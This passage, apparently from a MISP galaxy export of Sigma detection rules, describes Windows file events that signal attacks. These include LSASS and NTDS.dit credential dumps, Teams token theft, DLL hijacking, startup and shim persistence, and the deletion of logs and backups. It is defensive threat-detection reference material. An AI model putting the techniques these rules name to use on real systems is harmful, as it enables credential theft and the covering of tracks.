The tag is: misp-galaxy:sigma-rules="LSASS Process Memory Dump Creation Via Taskmgr.EXE"

LSASS Process Memory Dump Creation Via Taskmgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9992. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml

NTDS.DIT Created

Detects creation of a file named "ntds.dit" (Active Directory Database)

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Created"

NTDS.DIT Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9993. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml

Potential Persistence Via Notepad++ Plugins

Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Notepad++ Plugins"

Table 9994. Table References

Links

https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml

SafetyKatz Default Dump Filename

Detects default lsass dump filename from SafetyKatz

The tag is: misp-galaxy:sigma-rules="SafetyKatz Default Dump Filename"

SafetyKatz Default Dump Filename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9995. Table References

Links

https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63

https://github.com/GhostPack/SafetyKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml

Windows Binaries Write Suspicious Extensions

Detects Windows executables that writes files with suspicious extensions

The tag is: misp-galaxy:sigma-rules="Windows Binaries Write Suspicious Extensions"

Windows Binaries Write Suspicious Extensions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 9996. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml

ISO or Image Mount Indicator in Recent Files

Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.

The tag is: misp-galaxy:sigma-rules="ISO or Image Mount Indicator in Recent Files"

ISO or Image Mount Indicator in Recent Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9997. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore

https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml

ScreenConnect Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="ScreenConnect Temporary Installation Artefact"

ScreenConnect Temporary Installation Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9998. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml

Legitimate Application Dropped Executable

Detects programs on a Windows system that should not write executables to disk

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Executable"

Legitimate Application Dropped Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9999. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml

Suspicious Startup Folder Persistence

Detects when a file with a suspicious extension is created in the startup folder

The tag is: misp-galaxy:sigma-rules="Suspicious Startup Folder Persistence"

Suspicious Startup Folder Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10000. Table References

Links

https://github.com/last-byte/PersistenceSniper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via ErrorHandler.Cmd"

Table 10001. Table References

Links

https://github.com/last-byte/PersistenceSniper

https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml

Renamed VsCode Code Tunnel Execution - File Indicator

Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.

The tag is: misp-galaxy:sigma-rules="Renamed VsCode Code Tunnel Execution - File Indicator"

Table 10002. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml

ISO File Created Within Temp Folders

Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

The tag is: misp-galaxy:sigma-rules="ISO File Created Within Temp Folders"

ISO File Created Within Temp Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10003. Table References

Links

https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image

https://twitter.com/Sam0x90/status/1552011547974696960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

The tag is: misp-galaxy:sigma-rules="AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File"

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10004. Table References

Links

https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml

SCR File Write Event

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

The tag is: misp-galaxy:sigma-rules="SCR File Write Event"

SCR File Write Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10005. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Desk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml

Office Macro File Download

Detects the creation of a new office macro files on the systems via an application (browser, mail client).

The tag is: misp-galaxy:sigma-rules="Office Macro File Download"

Office Macro File Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10006. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml

New Custom Shim Database Created

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

The tag is: misp-galaxy:sigma-rules="New Custom Shim Database Created"

New Custom Shim Database Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 10007. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence

https://liberty-shell.com/sec/2020/02/25/shim-persistence/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

The tag is: misp-galaxy:sigma-rules="Potential Webshell Creation On Static Website"

Potential Webshell Creation On Static Website has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 10008. Table References

Links

PT ESC rule and personal experience[PT ESC rule and personal experience]

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml

Suspicious Get-Variable.exe Creation

Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

The tag is: misp-galaxy:sigma-rules="Suspicious Get-Variable.exe Creation"

Suspicious Get-Variable.exe Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10009. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/

https://www.joesandbox.com/analysis/465533/0/html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml

WerFault LSASS Process Memory Dump

Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials

The tag is: misp-galaxy:sigma-rules="WerFault LSASS Process Memory Dump"

WerFault LSASS Process Memory Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10010. Table References

Links

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml

Office Macro File Creation

Detects the creation of a new office macro files on the systems

The tag is: misp-galaxy:sigma-rules="Office Macro File Creation"

Office Macro File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10011. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml

Suspicious File Event With Teams Objects

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

The tag is: misp-galaxy:sigma-rules="Suspicious File Event With Teams Objects"

Suspicious File Event With Teams Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

Table 10012. Table References

Links

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml

Writing Local Admin Share

Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.

The tag is: misp-galaxy:sigma-rules="Writing Local Admin Share"

Writing Local Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 10013. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml

QuarksPwDump Dump File

Detects a dump file written by QuarksPwDump password dumper

The tag is: misp-galaxy:sigma-rules="QuarksPwDump Dump File"

QuarksPwDump Dump File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10014. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml

CrackMapExec File Creation Patterns

Detects suspicious file creation patterns found in logs when CrackMapExec is used

The tag is: misp-galaxy:sigma-rules="CrackMapExec File Creation Patterns"

CrackMapExec File Creation Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10015. Table References

Links

https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml

Powerup Write Hijack DLL

Powerup tool’s Write Hijack DLL exploits DLL hijacking for privilege escalation. In it’s default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).

The tag is: misp-galaxy:sigma-rules="Powerup Write Hijack DLL"

Powerup Write Hijack DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 10016. Table References

Links

https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml

Creation Of Non-Existent System DLL

Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.

The tag is: misp-galaxy:sigma-rules="Creation Of Non-Existent System DLL"

Creation Of Non-Existent System DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10017. Table References

Links

https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/

https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992

https://github.com/Wh04m1001/SysmonEoP

https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/

https://decoded.avast.io/martinchlumecky/png-steganography/

https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml

Wmiprvse Wbemcomn DLL Hijack - File

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="Wmiprvse Wbemcomn DLL Hijack - File"

Wmiprvse Wbemcomn DLL Hijack - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10018. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml

PowerShell Module File Created By Non-PowerShell Process

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

The tag is: misp-galaxy:sigma-rules="PowerShell Module File Created By Non-PowerShell Process"

Table 10019. Table References

Links

Internal Research[Internal Research]

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml

Windows Terminal Profile Settings Modification By Uncommon Process

Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.

The tag is: misp-galaxy:sigma-rules="Windows Terminal Profile Settings Modification By Uncommon Process"

Windows Terminal Profile Settings Modification By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015" with estimative-language:likelihood-probability="almost-certain"

Table 10020. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile

https://twitter.com/nas_bench/status/1550836225652686848

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml

DLL Search Order Hijackig Via Additional Space in Path

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files…​) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack

The tag is: misp-galaxy:sigma-rules="DLL Search Order Hijackig Via Additional Space in Path"

DLL Search Order Hijackig Via Additional Space in Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10021. Table References

Links

https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows

https://twitter.com/cyb3rops/status/1552932770464292864

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml

Suspicious Scheduled Task Write to System32 Tasks

Detects the creation of tasks from processes executed from suspicious locations

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Write to System32 Tasks"

Suspicious Scheduled Task Write to System32 Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 10022. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml

Suspicious Appended Extension

Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.

The tag is: misp-galaxy:sigma-rules="Suspicious Appended Extension"

Suspicious Appended Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 10023. Table References

Links

https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/

https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml

Potentially Suspicious Self Extraction Directive File Created

Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Self Extraction Directive File Created"

Potentially Suspicious Self Extraction Directive File Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10024. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml

IIS WebServer Access Logs Deleted

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="IIS WebServer Access Logs Deleted"

IIS WebServer Access Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10025. Table References

Links

https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml

TeamViewer Log File Deleted

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="TeamViewer Log File Deleted"

TeamViewer Log File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10026. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml

Potential PrintNightmare Exploitation Attempt

Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675

The tag is: misp-galaxy:sigma-rules="Potential PrintNightmare Exploitation Attempt"

Potential PrintNightmare Exploitation Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10027. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/cube0x0/CVE-2021-1675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml

Exchange PowerShell Cmdlet History Deleted

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Exchange PowerShell Cmdlet History Deleted"

Exchange PowerShell Cmdlet History Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10028. Table References

Links

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml

Backup Files Deleted

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

The tag is: misp-galaxy:sigma-rules="Backup Files Deleted"

Backup Files Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10029. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml

EventLog EVTX File Deleted

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="EventLog EVTX File Deleted"

EventLog EVTX File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10030. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml

File Deleted Via Sysinternals SDelete

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

The tag is: misp-galaxy:sigma-rules="File Deleted Via Sysinternals SDelete"

File Deleted Via Sysinternals SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10031. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/9

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml

Tomcat WebServer Logs Deleted

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Tomcat WebServer Logs Deleted"

Tomcat WebServer Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10032. Table References

Links

Internal Research[Internal Research]

https://linuxhint.com/view-tomcat-logs-windows/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml

Prefetch File Deleted

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="Prefetch File Deleted"

Prefetch File Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10033. Table References

Links

Internal Research[Internal Research]

https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml

PowerShell Console History Logs Deleted

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

The tag is: misp-galaxy:sigma-rules="PowerShell Console History Logs Deleted"

PowerShell Console History Logs Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 10034. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml

ADS Zone.Identifier Deleted By Uncommon Application

Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.

The tag is: misp-galaxy:sigma-rules="ADS Zone.Identifier Deleted By Uncommon Application"

ADS Zone.Identifier Deleted By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10035. Table References

Links

https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml

Unusual File Deletion by Dns.exe

Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual File Deletion by Dns.exe"

Unusual File Deletion by Dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10036. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html

